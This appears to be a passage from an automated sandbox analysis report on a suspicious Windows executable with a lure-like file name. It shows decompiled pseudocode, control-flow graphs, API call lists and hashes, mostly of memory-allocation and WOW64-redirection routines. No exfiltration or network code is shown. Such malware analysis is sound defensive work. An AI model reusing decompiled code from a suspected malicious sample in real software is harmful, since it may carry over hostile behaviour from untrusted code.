					 *0x4c112c = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"Wow64RevertWow64FsRedirection");
					if( *0x4c1128 == 0 ||  *0x4c112c == 0) {
						_t16 = 0;
					} else {
						_t16 = 1;
					}
					 *0x4c1130 = _t16;
					E00422D44( &_v12);
					E00422660(_v12,  &_v8);
					E004086E4( &_v8, L"shell32.dll");
					E00421230(_v8, _t27, 0x8000); // executed
					E004232EC(0x4c783afb,  &_v16);
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_push(0x4b5b61);
				return E00407A80( &_v16, 3);
			}









                                                                                              0x004b5a90
                                                                                              0x004b5a93
                                                                                              0x004b5a95
                                                                                              0x004b5a97
                                                                                              0x004b5a9b
                                                                                              0x004b5a9c
                                                                                              0x004b5aa1
                                                                                              0x004b5aa4
                                                                                              0x004b5aa7
                                                                                              0x004b5aae
                                                                                              0x004b5ac9
                                                                                              0x004b5ae3
                                                                                              0x004b5aef
                                                                                              0x004b5afa
                                                                                              0x004b5afe
                                                                                              0x004b5afe
                                                                                              0x004b5afe
                                                                                              0x004b5b00
                                                                                              0x004b5b08
                                                                                              0x004b5b13
                                                                                              0x004b5b20
                                                                                              0x004b5b2d
                                                                                              0x004b5b3a
                                                                                              0x004b5b3a
                                                                                              0x004b5b41
                                                                                              0x004b5b44
                                                                                              0x004b5b47
                                                                                              0x004b5b59

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5ABE
                                                                                                • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004B5B5A,?,00000000,00000000,00000000), ref: 004B5AD8
                                                                                                • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00000000), ref: 0040E20B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                              • API String ID: 1646373207-2130885113
                                                                                              • Opcode ID: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                                              • Instruction ID: b56c6da1e02aeac4ac36a9fb763b3b3a2bfa4c382daca5c5ea2a5d16c2919690
                                                                                              • Opcode Fuzzy Hash: 149d4641e6716bccfc7038b8b83dc43c2c59674e16c2d4af6eff100d23c955b7
                                                                                              • Instruction Fuzzy Hash: DA11A730604704AFD744EB76DC02F9DB7B4E749704F64447BF500A6591CABC6A04CA3D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403EE8, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 313 403ee8-403efa 314 403f00-403f10 313->314 315 404148-40414d 313->315 316 403f12-403f1f 314->316 317 403f68-403f71 314->317 318 404260-404263 315->318 319 404153-404164 315->319 320 403f21-403f2e 316->320 321 403f38-403f44 316->321 317->316 322 403f73-403f7f 317->322 325 403c94-403cbd VirtualAlloc 318->325 326 404269-40426b 318->326 323 404166-404182 319->323 324 40410c-404119 319->324 327 403f30-403f34 320->327 328 403f58-403f65 320->328 329 403f46-403f54 321->329 330 403fbc-403fc5 321->330 322->316 332 403f81-403f8d 322->332 333 404190-40419f 323->333 334 404184-40418c 323->334 324->323 331 40411b-404124 324->331 335 403cef-403cf5 325->335 336 403cbf-403cec call 403c48 325->336 343 404000-40400a 330->343 344 403fc7-403fd4 330->344 331->324 337 404126-40413a Sleep 331->337 332->316 338 403f8f-403f9b 332->338 341 4041a1-4041b5 333->341 342 4041b8-4041c0 333->342 339 4041ec-404202 334->339 336->335 337->323 349 40413c-404143 Sleep 337->349 338->317 350 403f9d-403fad Sleep 338->350 347 404204-404212 339->347 348 40421b-404227 339->348 341->339 352 4041c2-4041da 342->352 353 4041dc-4041de call 403bcc 342->353 345 40407c-404088 343->345 346 40400c-404037 343->346 344->343 354 403fd6-403fdf 344->354 361 4040b0-4040bf call 403bcc 345->361 362 40408a-40409c 345->362 356 404050-40405e 346->356 357 404039-404047 346->357 347->348 358 404214 347->358 359 404248 348->359 360 404229-40423c 348->360 349->324 350->316 363 403fb3-403fba Sleep 350->363 364 4041e3-4041eb 352->364 353->364 354->344 365 403fe1-403ff5 Sleep 354->365 368 404060-40407a call 403b00 356->368 369 4040cc 356->369 357->356 367 404049 357->367 358->348 370 40424d-40425f 359->370 360->370 371 40423e-404243 call 403b00 360->371 375 4040d1-40410a 361->375 379 4040c1-4040cb 361->379 372 4040a0-4040ae 362->372 373 40409e 362->373 363->317 365->343 366 403ff7-403ffe Sleep 365->366 366->344 367->356 368->375 369->375 371->370 372->375 373->372
                                                                                              C-Code - Quality: 68%
                                                                                              			E00403EE8(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* _t96;
				void** _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				void* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4bb059; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
							_t121 = _t96;
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00403C48();
								_t99 =  *0x4bdb80; // 0x4bdb7c
								 *_t147 = 0x4bdb7c;
								 *0x4bdb80 = _t121;
								 *(_t147 + 4) = _t99;
								 *_t99 = _t121;
								 *0x4bdb78 = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4bbaf8 + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4bbaf4;
							if((0xfffffffe << _t132 &  *0x4bbaf4) == 0) {
								_t133 =  *0x4bbaf0; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E00403BCC(_t125);
								} else {
									_t110 =  *0x4bbaec; // 0x2220dd0
									_t109 = _t110 - _t125;
									 *0x4bbaec = _t109;
									 *0x4bbaf0 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4bbae8 = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4bbb78 + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4bbaf8 + _t142 * 4;
								 *_t80 =  *(0x4bbaf8 + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4bbaf4], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E00403B00(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4bbae8 = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4bb990; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4bb059;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4bb989;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4bbae8], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4bbaf0; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E00403BCC(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4bbae8 = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4bbaec; // 0x2220dd0
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
									 *0x4bbaec = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4bbaf8 + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4bbaf8 + __eax * 4;
									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x4bbaf4], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E00403B00(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4bbae8 = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x2220df0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}






























                                                                                              0x00403ee8
                                                                                              0x00403ef4
                                                                                              0x00403efa
                                                                                              0x00404148
                                                                                              0x0040414d
                                                                                              0x00404260
                                                                                              0x00404261
                                                                                              0x00404263
                                                                                              0x00403c94
                                                                                              0x00403c98
                                                                                              0x00403c9a
                                                                                              0x00403ca4
                                                                                              0x00403cb4
                                                                                              0x00403cb9
                                                                                              0x00403cbd
                                                                                              0x00403cbf
                                                                                              0x00403cc1
                                                                                              0x00403cc7
                                                                                              0x00403cca
                                                                                              0x00403ccf
                                                                                              0x00403cd4
                                                                                              0x00403cda
                                                                                              0x00403ce0
                                                                                              0x00403ce3
                                                                                              0x00403ce5
                                                                                              0x00403cec
                                                                                              0x00403cec
                                                                                              0x00403cf5
                                                                                              0x00404269
                                                                                              0x00404269
                                                                                              0x0040426b
                                                                                              0x0040426b
                                                                                              0x00404153
                                                                                              0x00404153
                                                                                              0x0040415f
                                                                                              0x00404162
                                                                                              0x00404164
                                                                                              0x0040410c
                                                                                              0x00404111
                                                                                              0x00404119
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040411b
                                                                                              0x0040411d
                                                                                              0x00404124
                                                                                              0x00000000
                                                                                              0x00404126
                                                                                              0x00404128
                                                                                              0x00404132
                                                                                              0x0040413a
                                                                                              0x0040413e
                                                                                              0x00000000
                                                                                              0x0040413e
                                                                                              0x0040413a
                                                                                              0x00000000
                                                                                              0x00404124
                                                                                              0x0040410c
                                                                                              0x00404166
                                                                                              0x00404166
                                                                                              0x00404166
                                                                                              0x0040416e
                                                                                              0x00404171
                                                                                              0x0040417b
                                                                                              0x0040417b
                                                                                              0x00404182
                                                                                              0x00404195
                                                                                              0x00404199
                                                                                              0x0040419f
                                                                                              0x004041b8
                                                                                              0x004041be
                                                                                              0x004041be
                                                                                              0x004041c0
                                                                                              0x004041de
                                                                                              0x004041c2
                                                                                              0x004041c2
                                                                                              0x004041c7
                                                                                              0x004041c9
                                                                                              0x004041ce
                                                                                              0x004041d7
                                                                                              0x004041d7
                                                                                              0x004041e3
                                                                                              0x004041eb
                                                                                              0x004041a1
                                                                                              0x004041a1
                                                                                              0x004041ab
                                                                                              0x004041b3
                                                                                              0x00000000
                                                                                              0x004041b3
                                                                                              0x00404184
                                                                                              0x00404187
                                                                                              0x0040418a
                                                                                              0x004041ec
                                                                                              0x004041ec
                                                                                              0x004041ed
                                                                                              0x004041ee
                                                                                              0x004041f5
                                                                                              0x004041f8
                                                                                              0x004041fb
                                                                                              0x004041fe
                                                                                              0x00404200
                                                                                              0x00404202
                                                                                              0x00404209
                                                                                              0x0040420b
                                                                                              0x0040420b
                                                                                              0x0040420b
                                                                                              0x00404212
                                                                                              0x00404214
                                                                                              0x00404214
                                                                                              0x00404212
                                                                                              0x00404220
                                                                                              0x00404225
                                                                                              0x00404225
                                                                                              0x00404227
                                                                                              0x00404248
                                                                                              0x00404248
                                                                                              0x00404248
                                                                                              0x00404229
                                                                                              0x00404229
                                                                                              0x0040422f
                                                                                              0x00404232
                                                                                              0x00404236
                                                                                              0x0040423c
                                                                                              0x0040423e
                                                                                              0x0040423e
                                                                                              0x0040423c
                                                                                              0x0040424d
                                                                                              0x00404250
                                                                                              0x00404253
                                                                                              0x0040425f
                                                                                              0x0040425f
                                                                                              0x00404182
                                                                                              0x00403f00
                                                                                              0x00403f00
                                                                                              0x00403f02
                                                                                              0x00403f02
                                                                                              0x00403f09
                                                                                              0x00403f10
                                                                                              0x00403f68
                                                                                              0x00403f68
                                                                                              0x00403f6d
                                                                                              0x00403f71
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403f73
                                                                                              0x00403f73
                                                                                              0x00403f76
                                                                                              0x00403f7b
                                                                                              0x00403f7f
                                                                                              0x00403f81
                                                                                              0x00403f81
                                                                                              0x00403f84
                                                                                              0x00403f89
                                                                                              0x00403f8d
                                                                                              0x00403f8f
                                                                                              0x00403f92
                                                                                              0x00403f94
                                                                                              0x00403f9b
                                                                                              0x00000000
                                                                                              0x00403f9d
                                                                                              0x00403f9f
                                                                                              0x00403fa4
                                                                                              0x00403fa9
                                                                                              0x00403fad
                                                                                              0x00403fb5
                                                                                              0x00000000
                                                                                              0x00403fb5
                                                                                              0x00403fad
                                                                                              0x00403f9b
                                                                                              0x00403f8d
                                                                                              0x00000000
                                                                                              0x00403f7f
                                                                                              0x00403f68
                                                                                              0x00403f12
                                                                                              0x00403f12
                                                                                              0x00403f15
                                                                                              0x00403f18
                                                                                              0x00403f1d
                                                                                              0x00403f1f
                                                                                              0x00403f38
                                                                                              0x00403f3b
                                                                                              0x00403f3f
                                                                                              0x00403f41
                                                                                              0x00403f44
                                                                                              0x00403fbc
                                                                                              0x00403fbd
                                                                                              0x00403fbe
                                                                                              0x00403fc5
                                                                                              0x00403fc7
                                                                                              0x00403fc7
                                                                                              0x00403fcc
                                                                                              0x00403fd4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403fd6
                                                                                              0x00403fd8
                                                                                              0x00403fdf
                                                                                              0x00000000
                                                                                              0x00403fe1
                                                                                              0x00403fe3
                                                                                              0x00403fe8
                                                                                              0x00403fed
                                                                                              0x00403ff5
                                                                                              0x00403ff9
                                                                                              0x00000000
                                                                                              0x00403ff9
                                                                                              0x00403ff5
                                                                                              0x00000000
                                                                                              0x00403fdf
                                                                                              0x00403fc7
                                                                                              0x00404000
                                                                                              0x00404004
                                                                                              0x00404004
                                                                                              0x0040400a
                                                                                              0x0040407c
                                                                                              0x00404080
                                                                                              0x00404086
                                                                                              0x00404088
                                                                                              0x004040b0
                                                                                              0x004040b4
                                                                                              0x004040b6
                                                                                              0x004040bb
                                                                                              0x004040bd
                                                                                              0x004040bf
                                                                                              0x00000000
                                                                                              0x004040c1
                                                                                              0x004040c1
                                                                                              0x004040c6
                                                                                              0x004040c8
                                                                                              0x004040c9
                                                                                              0x004040ca
                                                                                              0x004040cb
                                                                                              0x004040cb
                                                                                              0x0040408a
                                                                                              0x0040408a
                                                                                              0x00404090
                                                                                              0x00404094
                                                                                              0x0040409a
                                                                                              0x0040409c
                                                                                              0x0040409e
                                                                                              0x0040409e
                                                                                              0x004040a0
                                                                                              0x004040a2
                                                                                              0x004040a8
                                                                                              0x00000000
                                                                                              0x004040a8
                                                                                              0x0040400c
                                                                                              0x0040400c
                                                                                              0x0040400f
                                                                                              0x00404016
                                                                                              0x0040401d
                                                                                              0x00404020
                                                                                              0x00404023
                                                                                              0x0040402a
                                                                                              0x0040402d
                                                                                              0x00404030
                                                                                              0x00404033
                                                                                              0x00404035
                                                                                              0x00404037
                                                                                              0x00404039
                                                                                              0x0040403e
                                                                                              0x00404040
                                                                                              0x00404040
                                                                                              0x00404040
                                                                                              0x00404047
                                                                                              0x00404049
                                                                                              0x00404049
                                                                                              0x00404047
                                                                                              0x00404050
                                                                                              0x00404055
                                                                                              0x00404058
                                                                                              0x0040405e
                                                                                              0x004040cc
                                                                                              0x004040cc
                                                                                              0x004040cc
                                                                                              0x00404060
                                                                                              0x00404060
                                                                                              0x00404062
                                                                                              0x00404066
                                                                                              0x00404068
                                                                                              0x0040406b
                                                                                              0x0040406e
                                                                                              0x00404071
                                                                                              0x00404075
                                                                                              0x00404075
                                                                                              0x004040d1
                                                                                              0x004040d1
                                                                                              0x004040d1
                                                                                              0x004040d4
                                                                                              0x004040d7
                                                                                              0x004040d9
                                                                                              0x004040de
                                                                                              0x004040e0
                                                                                              0x004040e3
                                                                                              0x004040ea
                                                                                              0x004040ed
                                                                                              0x004040ed
                                                                                              0x004040f0
                                                                                              0x004040f4
                                                                                              0x004040f7
                                                                                              0x004040fa
                                                                                              0x004040fc
                                                                                              0x004040fc
                                                                                              0x004040fe
                                                                                              0x00404101
                                                                                              0x00404104
                                                                                              0x00404107
                                                                                              0x00404108
                                                                                              0x00404109
                                                                                              0x0040410a
                                                                                              0x0040410a
                                                                                              0x00403f46
                                                                                              0x00403f46
                                                                                              0x00403f46
                                                                                              0x00403f46
                                                                                              0x00403f4a
                                                                                              0x00403f4d
                                                                                              0x00403f50
                                                                                              0x00403f53
                                                                                              0x00403f54
                                                                                              0x00403f54
                                                                                              0x00403f21
                                                                                              0x00403f21
                                                                                              0x00403f25
                                                                                              0x00403f25
                                                                                              0x00403f28
                                                                                              0x00403f2b
                                                                                              0x00403f2e
                                                                                              0x00403f58
                                                                                              0x00403f5b
                                                                                              0x00403f5e
                                                                                              0x00403f61
                                                                                              0x00403f64
                                                                                              0x00403f65
                                                                                              0x00403f30
                                                                                              0x00403f30
                                                                                              0x00403f33
                                                                                              0x00403f34
                                                                                              0x00403f34
                                                                                              0x00403f2e
                                                                                              0x00403f1f

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                                                              • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                                                              • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                                                              • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                                              • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
                                                                                              • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                                              • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407750, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 402 407750-407764 403 407766-407772 call 407630 call 4076b8 402->403 404 407777-40777e 402->404 403->404 406 407780-40778b GetCurrentThreadId 404->406 407 4077a1-4077a5 404->407 406->407 409 40778d-40779c call 407388 call 40768c 406->409 410 4077a7-4077ae 407->410 411 4077c9-4077cd 407->411 409->407 410->411 416 4077b0-4077c7 410->416 412 4077d9-4077dd 411->412 413 4077cf-4077d2 411->413 418 4077fc-407805 call 4073b0 412->418 419 4077df-4077e8 call 4054b4 412->419 413->412 417 4077d4-4077d6 413->417 416->411 417->412 428 407807-40780a 418->428 429 40780c-407811 418->429 419->418 430 4077ea-4077fa call 405ce8 call 4054b4 419->430 428->429 431 40782d-407838 call 407388 428->431 429->431 432 407813-407821 call 40b40c 429->432 430->418 441 40783a 431->441 442 40783d-407841 431->442 432->431 440 407823-407825 432->440 440->431 444 407827-407828 FreeLibrary 440->444 441->442 445 407843-407845 call 40768c 442->445 446 40784a-40784d 442->446 444->431 445->446 447 407866 446->447 448 40784f-407856 446->448 450 407858 448->450 451 40785e-407861 ExitProcess 448->451 450->451
                                                                                              C-Code - Quality: 86%
                                                                                              			E00407750() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t46);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L8:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L14:
						E004073B0(); // executed
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t15 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t15);
								_t31 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t31 + 0x10; // 0x400000
